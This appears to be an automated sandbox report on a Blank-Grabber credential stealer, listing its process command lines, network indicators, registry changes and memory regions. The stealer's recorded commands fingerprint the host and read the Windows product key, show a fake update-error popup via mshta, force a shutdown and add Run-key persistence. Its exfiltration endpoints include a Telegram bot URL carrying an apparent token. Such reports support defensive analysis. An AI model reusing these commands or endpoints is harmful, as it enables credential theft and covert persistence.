C:\Windows\System32\wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
malicious
C:\Users\user\AppData\Roaming\word.exe
C:\Users\user\AppData\Roaming\word.exe
malicious
C:\Users\user\AppData\Roaming\word.exe
C:\Users\user\AppData\Roaming\word.exe
malicious
C:\Windows\System32\shutdown.exe
shutdown.exe /f /s /t 0
malicious
C:\Users\user\AppData\Roaming\word.exe
C:\Users\user\AppData\Roaming\word.exe
malicious
C:\Users\user\AppData\Roaming\word.exe
C:\Users\user\AppData\Roaming\word.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 97 hidden processes, click here to show them.

URLs

Name
IP
Malicious
198.23.219.104
malicious
https://api.telegram.org/bot
unknown
malicious
http://logo.ver6
unknown
https://github.com/Blank-c/BlankOBF
unknown
https://www.avito.ru/
unknown
https://github.com/Blank-c/Blank-Grabberi
unknown
https://www.ctrip.com/
unknown
https://github.com/Blank-c/Blank-Grabberr
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://weibo.com/
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
http://cacerts.digi
unknown
https://peps.python.org/pep-0205/
unknown
https://www.reddit.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://www.ebay.co.uk/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://www.ebay.de/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
https://go.micro
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
https://github.com/python/cpython/issues/86361.
unknown
https://contoso.com/Icon
unknown
https://httpbin.org/
unknown
http://crl.ver)
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.youtube.com/
unknown
https://allegro.pl/
unknown
https://github.com/Pester/Pester
unknown
http://go.mic
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
https://www.python.org/psf/license/
unknown
https://www.bbc.co.uk/
unknown
https://bugzilla.mo
unknown
https://api.anonfiles.com/uploadr
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://google.com/mail
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
https://www.python.org/psf/license/)
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
https://www.google.com/
unknown
https://www.iqiyi.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
https://api.gofile.io/getServerr
unknown
http://ocsp.sectigo.com0
unknown
https://tools.ietf.org/html/rfc7231#section-4.3.6)
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument
149.154.167.220
http://ip-api.com/json/?fields=225545r
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
https://yahoo.com/
unknown
https://account.bellmedia.c
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_U
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
https://login.microsoftonline.com
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://www.ifeng.com/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://www.zhihu.com/
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
unknown
https://contoso.com/
unknown
https://oneget.orgX
unknown
https://api.gofile.io/getServer
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220
malicious
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
198.23.219.104
unknown
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
208.95.112.1
ip-api.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
1280x1024x32(BGR 0)
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
word
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1D372114000
heap
page read and write
malicious
1D372112000
heap
page read and write
malicious
31B1000
trusted library allocation
page read and write
malicious
281ABA90000
heap
page read and write
malicious
281ABA90000
heap
page read and write
malicious
281AC033000
heap
page read and write
malicious
281ABA90000
heap
page read and write
malicious
2617000
trusted library allocation
page read and write
malicious
281ABC20000
direct allocation
page read and write
malicious
281AC037000
heap
page read and write
malicious
281ABA90000
heap
page read and write
malicious
2F2000
unkown
page readonly
malicious
281AC033000
heap
page read and write
malicious
281ABA90000
heap
page read and write
malicious
281ABF76000
heap
page read and write
19525FED000
heap
page read and write
7FFD9A7C0000
trusted library allocation
page read and write
281AC033000
heap
page read and write
7FFD9A7FC000
trusted library allocation
page execute and read and write
21B78EE0000
heap
page read and write
281AB627000
heap
page read and write
281AC9BA000
heap
page read and write
15D0000
heap
page read and write
1164000
heap
page read and write
1B8AC234000
heap
page read and write
174F199C000
heap
page read and write
23BCCB14000
heap
page read and write
2224EF1B000
heap
page read and write
D19917F000
stack
page read and write
174F199C000
heap
page read and write
281AC8D0000
direct allocation
page read and write
1C098BDD000
heap
page read and write
1C098B10000
heap
page read and write
7FFE11EE0000
unkown
page execute and read and write
7FFDFA9A1000
unkown
page execute and read and write
7FFD9A7A3000
trusted library allocation
page execute and read and write
281ABEF0000
heap
page read and write
281AB963000
heap
page read and write
7FFD9A870000
trusted library allocation
page execute and read and write
1BFD0450000
heap
page read and write
1D0CCE20000
heap
page read and write
82985FE000
stack
page read and write
1670000
heap
page read and write
281AC9C6000
heap
page read and write
1EC76621000
heap
page read and write
281AB64C000
heap
page read and write
1FCD60B0000
heap
page read and write
26469AF5000
heap
page read and write
222498B1000
heap
page read and write
16CEEF16000
heap
page read and write
174F197B000
heap
page read and write
227EEE10000
heap
page read and write
1F224A2A000
heap
page read and write
7FFD9AA10000
trusted library allocation
page read and write
1B82E000
stack
page read and write
281AC0C6000
heap
page read and write
281AC8A0000
direct allocation
page read and write
CA862FF000
unkown
page read and write
106B000
heap
page read and write
2463ED8D000
trusted library allocation
page read and write
CE770FF000
unkown
page read and write
2A1302B6000
heap
page read and write
11A1000
heap
page read and write
281AB6D0000
heap
page read and write
2A75F520000
heap
page read and write
7FFE14630000
unkown
page readonly
159F000
stack
page read and write
1DFEFC3E000
heap
page read and write
1CC4C000
stack
page read and write
7FFD9A980000
trusted library allocation
page execute and read and write
7FFDFB641000
unkown
page execute and read and write
1172000
heap
page read and write
E8C8C7F000
stack
page read and write
281AB5E0000
heap
page read and write
2462EA80000
heap
page execute and read and write
23BCD010000
heap
page read and write
281ABB0D000
heap
page read and write
7FF644871000
unkown
page execute read
2F000FE000
stack
page read and write
1FCD6193000
heap
page read and write
1FCD61C6000
heap
page read and write
1C098BF0000
heap
page read and write
2155AA94000
heap
page read and write
12A5E0A5000
heap
page read and write
2074DB10000
heap
page read and write
1DFEFC43000
heap
page read and write
1FCD67D8000
heap
page read and write
23BCD01F000
heap
page read and write
174F1B38000
heap
page read and write
174F1946000
heap
page read and write
19524FBD000
heap
page read and write
246302FD000
trusted library allocation
page read and write
7FFD9AAA0000
trusted library allocation
page read and write
1DFEFC7B000
heap
page read and write
281AB6B7000
heap
page read and write
1412F738000
heap
page read and write
174F1A3D000
trusted library allocation
page read and write
281ABF1D000
heap
page read and write
7375FFD000
stack
page read and write
23BCE990000
heap
page read and write
1DA81880000
heap
page read and write
281ABF60000
heap
page read and write
2DDB4EE4000
heap
page read and write
1BF1F000
heap
page read and write
20354F20000
heap
page read and write
1DFEFC4A000
heap
page read and write
281AC538000
direct allocation
page read and write
7FF644871000
unkown
page execute read
1C099200000
heap
page read and write
1DFF31D0000
direct allocation
page read and write
2224F350000
trusted library allocation
page read and write
2684AE70000
heap
page read and write
19525FE5000
heap
page read and write
2890000
heap
page read and write
2538CB55000
heap
page read and write
1BFD0640000
heap
page read and write
21B794FC000
heap
page read and write
16CEF150000
trusted library allocation
page read and write
1C09922E000
heap
page read and write
23699F85000
heap
page read and write
1DFEFC6D000
heap
page read and write
19525F95000
heap
page read and write
174F1A37000
trusted library allocation
page read and write
23BCCB1A000
heap
page read and write
281ABA0D000
heap
page read and write
23BCC92A000
heap
page read and write
19525FAB000
heap
page read and write
281AB662000
heap
page read and write
25F37827000
heap
page read and write
1F23D3B0000
heap
page read and write
1215000
heap
page read and write
12FE1000
trusted library allocation
page read and write
25F379C0000
heap
page read and write
23E907C1000
heap
page read and write
21B7ADEE000
heap
page read and write
1C09921F000
heap
page read and write
7FFE13381000
unkown
page execute and read and write
C8A5DCC000
stack
page read and write
1F2230CD000
heap
page read and write
1DFF1644000
heap
page read and write
7FFD9A793000
trusted library allocation
page execute and read and write
281ACBED000
heap
page read and write
7FF71F13E000
unkown
page readonly
281ACB27000
heap
page read and write
23BCC925000
heap
page read and write
16CEEF70000
heap
page read and write
20354F27000
heap
page read and write
2A75F5D8000
heap
page read and write
2262DA11000
heap
page read and write
7FFD9AA50000
trusted library allocation
page read and write
281ABECD000
heap
page read and write
23BCE992000
heap
page read and write
174F1A20000
trusted library allocation
page read and write
318E000
stack
page read and write
23BCCB1E000
heap
page read and write
7DFCAFF000
stack
page read and write
21253210000
heap
page read and write
264FC1F6000
heap
page read and write
26469A92000
heap
page read and write
281ABEC3000
heap
page read and write
1BFD0750000
heap
page read and write
10E5000
heap
page read and write
281ACA05000
heap
page read and write
24647399000
heap
page read and write
7FFDFAE99000
unkown
page execute and read and write
1C098C45000
heap
page read and write
281AB962000
heap
page read and write
2DDB4EEB000
heap
page read and write
21B78F00000
trusted library allocation
page read and write
7FFE0EC40000
unkown
page readonly
2224EDD0000
trusted library allocation
page read and write
19525FAB000
heap
page read and write
26469A68000
heap
page read and write
281AC9CC000
heap
page read and write
21B78FA4000
heap
page read and write
2DDB4E70000
heap
page read and write
281AC08E000
heap
page read and write
16002904000
heap
page read and write
7FFE130C0000
unkown
page readonly
16CEEEC6000
heap
page read and write
281AB6D6000
heap
page read and write
281A9B70000
heap
page read and write
281AC102000
heap
page read and write
2ED0000
heap
page read and write
2462FFAF000
trusted library allocation
page read and write
19525EE1000
heap
page read and write
227EEFC0000
heap
page read and write
16CEEEDD000
heap
page read and write
7FFD9A7D3000
trusted library allocation
page execute and read and write
2262D970000
heap
page read and write
1DB90000
heap
page read and write
19525FDD000
heap
page read and write
281AB93A000
heap
page read and write
19525FDD000
heap
page read and write
21B794EE000
heap
page read and write
77B000
heap
page read and write
19524800000
heap
page read and write
1C09924A000
heap
page read and write
21253210000
heap
page read and write
215478E4000
heap
page read and write
246472B1000
heap
page read and write
264FC1F2000
heap
page read and write
281ABEBA000
heap
page read and write
281AB9C6000
heap
page read and write
23BCC932000
heap
page read and write
7FFD9A7C0000
trusted library allocation
page read and write
1F224A24000
heap
page read and write
2646A28C000
heap
page read and write
F20CC7E000
stack
page read and write
7FF6448B2000
unkown
page read and write
281AD1D0000
direct allocation
page read and write
281ABA9A000
heap
page read and write
281AC08B000
heap
page read and write
1BD7E000
stack
page read and write
21B78F93000
heap
page read and write
1FCD67F3000
heap
page read and write
281AC9CE000
heap
page read and write
281ABF64000
heap
page read and write
7DF4C1460000
trusted library allocation
page execute and read and write
12A5E0CC000
heap
page read and write
13EE000
heap
page read and write
12A5E0D9000
heap
page read and write
1FCD6334000
heap
page read and write
1380000
heap
page read and write
281AB651000
heap
page read and write
70EAF0E000
stack
page read and write
281AC510000
direct allocation
page read and write
281AC07C000
heap
page read and write
14CC05D0000
heap
page read and write
7FFD9A96A000
trusted library allocation
page read and write
7375CE8000
stack
page read and write
7FFDFAA27000
unkown
page execute and read and write
2646A2A9000
heap
page read and write
7FFE11EC1000
unkown
page execute and read and write
281ABEDC000
heap
page read and write
1328000
heap
page read and write
23BCC925000
heap
page read and write
16CEEF3C000
heap
page read and write
2DDB4EBB000
heap
page read and write
1F226776000
trusted library allocation
page read and write
16CEEF16000
heap
page read and write
19522D1F000
heap
page read and write
7FFD9A7CD000
trusted library allocation
page execute and read and write
1A5F0000
trusted library allocation
page read and write
23BCC913000
heap
page read and write
1B815000
stack
page read and write
25B4F060000
heap
page read and write
21B78FD7000
heap
page read and write
23BCC913000
heap
page read and write
16CEEF23000
heap
page read and write
12A5E097000
heap
page read and write
7FFD9A80C000
trusted library allocation
page execute and read and write
281AC11C000
heap
page read and write
636AD7C000
stack
page read and write
2DDB4E10000
heap
page read and write
174F1B38000
heap
page read and write
264FC180000
heap
page read and write
1EC76530000
heap
page read and write
281AC10E000
heap
page read and write
2DDB4DE0000
heap
page read and write
281AC8B0000
direct allocation
page read and write
17D13C51000
heap
page read and write
281AC9CA000
heap
page read and write
7FFDFB2F2000
unkown
page execute and read and write
7FFD9AB08000
trusted library allocation
page read and write
16CEEF76000
heap
page read and write
23671050000
heap
page read and write
281AC11A000
heap
page read and write
7FFD9A7D0000
trusted library allocation
page read and write
281AC11C000
heap
page read and write
7FFE13391000
unkown
page execute and read and write
23BCC913000
heap
page read and write
281AD1E0000
direct allocation
page read and write
281AC03E000
heap
page read and write
1D37210F000
heap
page read and write
281AC9CC000
heap
page read and write
21B78FD7000
heap
page read and write
281AC9C4000
heap
page read and write
23BCD034000
heap
page read and write
1CA952C2000
heap
page read and write
281ABF4C000
heap
page read and write
2646BB2E000
heap
page read and write
2646BC50000
heap
page read and write
174F1949000
heap
page read and write
227EEDB0000
heap
page read and write
281AC940000
direct allocation
page read and write
27A16FF000
stack
page read and write
177F000
stack
page read and write
16CEEF6B000
heap
page read and write
1B3F6A71000
heap
page read and write
281ABF76000
heap
page read and write
281AC9EE000
heap
page read and write
1210000
heap
page read and write
281A9B40000
heap
page read and write
2DDB4EDC000
heap
page read and write
23BCD028000
heap
page read and write
264FC18A000
heap
page read and write
29AF000
trusted library allocation
page read and write
281AC960000
direct allocation
page read and write
7FFD9A7AD000
trusted library allocation
page execute and read and write
1478000
heap
page read and write
7FFD9A7B0000
trusted library allocation
page read and write
23BCC92B000
heap
page read and write
16CEEF23000
heap
page read and write
2224AC70000
trusted library allocation
page read and write
1FCD6320000
heap
page read and write
1FCD67CE000
heap
page read and write
2462D1BC000
heap
page read and write
19524E89000
heap
page read and write
1D37210F000
heap
page read and write
70E9BCF000
stack
page read and write
1C09AB80000
heap
page read and write
281AC9EB000
heap
page read and write
281AC9EE000
heap
page read and write
119B000
heap
page read and write
2224F0A0000
remote allocation
page read and write
281ABF21000
heap
page read and write
16CEF06B000
heap
page read and write
281ABF24000
heap
page read and write
281AC08E000
heap
page read and write
211E2F70000
heap
page read and write
281ABF4C000
heap
page read and write
1F226A80000
trusted library allocation
page read and write
2224F091000
trusted library allocation
page read and write
26469B25000
heap
page read and write
281AC11A000
heap
page read and write
281AC520000
direct allocation
page read and write
24630871000
trusted library allocation
page read and write
1F23D3E6000
heap
page read and write
281AC11E000
heap
page read and write
2224ED30000
trusted library allocation
page read and write
174F1941000
heap
page read and write
21B78F57000
heap
page read and write
E8C8BFE000
stack
page read and write
16CEF050000
heap
page read and write
281AC9CE000
heap
page read and write
281AC05E000
heap
page read and write
7FFD9A982000
trusted library allocation
page read and write
21B794F4000
heap
page read and write
2DDB4EEB000
heap
page read and write
26469AA7000
heap
page read and write
26469B15000
heap
page read and write
26469B27000
heap
page read and write
1DFEFC73000
heap
page read and write
1F23D3A0000
heap
page read and write
281AC424000
direct allocation
page read and write
23E908A0000
heap
page read and write
7FFD9A7E1000
trusted library allocation
page read and write
21B78FD7000
heap
page read and write
2462F955000
trusted library allocation
page read and write
281AD300000
direct allocation
page read and write
1FCD633E000
heap
page read and write
CBA000
heap
page read and write
1F223103000
heap
page read and write
23BCC8F5000
heap
page read and write
1DFEFC2B000
heap
page read and write
25F37815000
heap
page read and write
1B93B000
stack
page read and write
2646A2B9000
heap
page read and write
1C09922E000
heap
page read and write
7FFD9A886000
trusted library allocation
page execute and read and write
7FFD9AB90000
trusted library allocation
page read and write
281ACD43000
heap
page read and write
21B794E0000
heap
page read and write
1DFF30D0000
direct allocation
page read and write
281AD1A0000
direct allocation
page read and write
281ADB50000
direct allocation
page read and write
7FFDFB032000
unkown
page execute and read and write
1F23D19C000
heap
page read and write
1FCD619E000
heap
page read and write
1340000
trusted library allocation
page read and write
A977BED000
stack
page read and write
21B78FCA000
heap
page read and write
25F37808000
heap
page read and write
281AC11E000
heap
page read and write
1FCD6191000
heap
page read and write
21B78F57000
heap
page read and write
7FFDFB050000
unkown
page readonly
1F23D3CD000
heap
page read and write
1FCD632A000
heap
page read and write
1C09AB94000
heap
page read and write
7FFDF8551000
unkown
page execute and read and write
26469AB7000
heap
page read and write
1DFEFC31000
heap
page read and write
211E31A0000
heap
page read and write
281ABE6E000
heap
page read and write
7FFDFB705000
unkown
page execute and write copy
281AC111000
heap
page read and write
1061000
heap
page read and write
281ACD7B000
heap
page read and write
1DFF3239000
direct allocation
page read and write
1C098AF0000
heap
page read and write
281AB6A2000
heap
page read and write
1DFEFC4D000
heap
page read and write
22249906000
heap
page read and write
23BCC8A0000
heap
page read and write
2538C920000
heap
page read and write
1D37211C000
heap
page read and write
12A5E0AB000
heap
page read and write
50D2CFF000
stack
page read and write
7FFE0EC10000
unkown
page readonly
7FFDFAA4C000
unkown
page execute and read and write
281AB6B1000
heap
page read and write
BE0000
heap
page read and write
281ABFBF000
heap
page read and write
1C09920E000
heap
page read and write
19524804000
heap
page read and write
281AB6AF000
heap
page read and write
19525FED000
heap
page read and write
16CEEED0000
heap
page read and write
281ABE6E000
heap
page read and write
1B3F6E04000
heap
page read and write
2E41000
trusted library allocation
page read and write
2646A29F000
heap
page read and write
26469CF0000
heap
page read and write
281AC414000
direct allocation
page read and write
16CEEEAA000
heap
page read and write
23BCC929000
heap
page read and write
131B3000
trusted library allocation
page read and write
19525F4C000
heap
page read and write
264FC1ED000
heap
page read and write
2DDB4EB6000
heap
page read and write
2DDB4EEB000
heap
page read and write
1F8B271B000
heap
page read and write
281ABF48000
heap
page read and write
7FFD9AC20000
trusted library allocation
page read and write
1FCD61CC000
heap
page read and write
1BC7E000
stack
page read and write
E269DFF000
unkown
page read and write
1CD4C000
stack
page read and write
25B4F181000
heap
page read and write
2860000
heap
page execute and read and write
174F1A3A000
trusted library allocation
page read and write
7FFDFB051000
unkown
page execute and read and write
23F8AB60000
heap
page read and write
12A5E050000
heap
page read and write
26469B34000
heap
page read and write
281ABA70000
heap
page read and write
26469AA5000
heap
page read and write
281AB6CE000
heap
page read and write
16CEEF19000
heap
page read and write
1B620000
heap
page read and write
281AC0AE000
heap
page read and write
281AC9A5000
heap
page read and write
1B3F69C0000
heap
page read and write
1D0CCE2B000
heap
page read and write
281AB6D3000
heap
page read and write
73760FE000
stack
page read and write
13EC000
heap
page read and write
D19907E000
stack
page read and write
2367112D000
heap
page read and write
281ABE50000
heap
page read and write
2224A300000
trusted library allocation
page read and write
160026E1000
heap
page read and write
7FFD9A7A4000
trusted library allocation
page read and write
15E847D0000
heap
page read and write
2A04CF71000
heap
page read and write
7FF71F118000
unkown
page write copy
1D37211C000
heap
page read and write
B0EAAFC000
stack
page read and write
26469B37000
heap
page read and write
281ACA01000
heap
page read and write
281ABADD000
heap
page read and write
82984FF000
stack
page read and write
281AC08E000
heap
page read and write
1F8B26E0000
heap
page read and write
2A75F974000
heap
page read and write
23E90670000
heap
page read and write
83470FE000
unkown
page read and write
1DFEFC2B000
heap
page read and write
7FFDFB6F8000
unkown
page execute and read and write
23E907B9000
heap
page read and write
264FC184000
heap
page read and write
2684AE90000
heap
page read and write
7FFE13398000
unkown
page read and write
281ACA1C000
heap
page read and write
1C09921C000
heap
page read and write
C2F0DDE000
stack
page read and write
1C098C67000
heap
page read and write
23BCE99E000
heap
page read and write
7FFD9A82C000
trusted library allocation
page execute and read and write
281AB922000
heap
page read and write
281AB9E9000
heap
page read and write
7FFD9AB09000
trusted library allocation
page read and write
23699FBE000
heap
page read and write
19525FC3000
heap
page read and write
23BCC92A000
heap
page read and write
1342000
heap
page read and write
1D37210F000
heap
page read and write
281ACD47000
heap
